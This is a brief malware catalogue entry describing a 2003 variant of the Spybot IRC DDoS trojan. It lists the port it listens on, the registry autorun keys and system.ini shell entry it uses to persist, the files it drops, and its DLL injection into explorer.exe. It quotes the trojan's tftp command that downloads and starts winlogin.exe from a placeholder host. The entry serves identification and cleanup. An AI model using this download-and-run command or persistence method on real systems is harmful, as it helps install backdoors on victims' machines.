by ?
Released in august 2003
Server: port: 113 TCP startup: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce "winlogon" HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "NDplDeamon" HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "winlogon" c:\windows\system.ini, [boot] "shell" added: c:\WINDOWS\SYSTEM\winlogin.exe c:\WINDOWS\SYSTEM\yuetyutr.dll (Backdoor.SdBot.au) c:\WINDOWS\TEMP\vhbmhbze.txt remarks: A variant of the Spybot IRC DDoS zombie. The trojan infects a system using the RPC/DCOM exploit shellcode. It runs the following commands: C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe C:\WINNT\system32>start winlogin.exe C:\WINNT\system32>winlogin.exe the dropped yuetyutr.dll is injected into the explorer.exe process by winlogin.exeMegaSecurity